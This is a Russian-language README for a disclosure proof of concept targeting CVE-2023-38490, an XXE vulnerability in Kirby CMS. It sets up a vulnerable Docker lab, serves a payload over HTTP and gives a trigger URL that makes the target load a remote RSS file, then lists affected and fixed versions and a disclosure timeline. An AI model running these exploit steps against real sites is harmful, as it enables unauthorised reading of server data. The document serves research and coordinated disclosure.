Kirby XML External Entity (XXE) - CVE-2023-38490 эксплойт
Kirby < 3.9.6 XML-внешняя сущность
Эксплойт для CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Демонстрация эксплуатации
Сборка и запуск уязвимого демо-приложения:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Обслуживание демонстрационной полезной нагрузки:
Примечание: выберите адрес привязки, к которому может получить доступ docker-контейнер.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Запуск эксплойта:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
Как и почему это работает?
Уязвимая функция присутствует в ядре Kirby, но не используется по умолчанию в Kirby Core, Kirby StarterKit или Kirby PlainKit. Это означает, что уязвимость не затронет вас при конфигурации по умолчанию, но может быть внедрена при индивидуальной разработке или установке плагина, использующего затронутый инструментарий.
Для получения дополнительных сведений прочитайте специальную статью (EN 🇬🇧 или FR 🇫🇷).
Ссылки
- Целевое ПО: Kirby
- Домашняя страница / Вендор: https://getkirby.com/
- Исходный код:
- Уязвимые версии:
- <= 3.5.8.2
- 3.6.0-3.6.6.2
- 3.7.0-3.7.5.1
- 3.8.0-3.8.4
- 3.9.0-3.9.5
- Исправленные версии:
- 3.5.8.3+
- 3.6.6.3+
- 3.7.5.2+
- 3.8.4.1+
- 3.9.6+
- Патчи:
- Уведомления:
Хронология
- Неделя 24 – Пн, 12 июн 2023: Уязвимость обнаружена Александром ЗАННИ (@noraj), инженером по тестированию на проникновение в ACCEIS.
- Неделя 24 – Вт, 13 июн 2023: Уязвимость сообщена редактору (Kirby) Александром ЗАННИ
- Неделя 24 – Ср, 14 июн 2023: Доказательство концепции предоставлено редактору (Kirby) Александром ЗАННИ
- Неделя 24 – Ср, 14 июн 2023: Добавлен security.txt согласно RFC 9116 на сайте getkirby.com
- Неделя 24 – Чт, 15 июн 2023: Уязвимость подтверждена редактором (Kirby)
- Неделя 24 – Чт, 15 июн 2023: Запланирован выпуск исправлений и патчей
- Неделя 26 – Чт, 29 июн 2023: Уязвимость независимо обнаружена Патриком ФАЛБ (@dapatrese) в FORMER 03.
- Неделя 28 – Вс, 16 июл 2023: Создание частного уведомления GitHub
- Неделя 29 – Вс, 23 июл 2023: Запрошен идентификатор CVE
- Неделя 29 – Вс, 23 июл 2023: Уязвимость исправлена редактором (Kirby)
- Неделя 30 – Пн, 24 июл 2023: Александр ЗАННИ приглашен редактором (Kirby) в частное уведомление
- Неделя 30 – Пн, 24 июл 2023: Подготовка уязвимого демонстрационного docker-контейнера Александром ЗАННИ
- Неделя 30 – Пн, 24 июл 2023: Идентификатор CVE CVE-2023-38490 зарегистрирован (зарезервирован)
- Неделя 30 – Чт, 27 июл 2023: Публичный выпуск уведомления GitHub и патчей
Отказ от ответственности
ACCEIS не пропагандирует и не поощряет любую незаконную деятельность. Все материалы, предоставленные в этом репозитории, предназначены только для исследований, обучения и обнаружения угроз.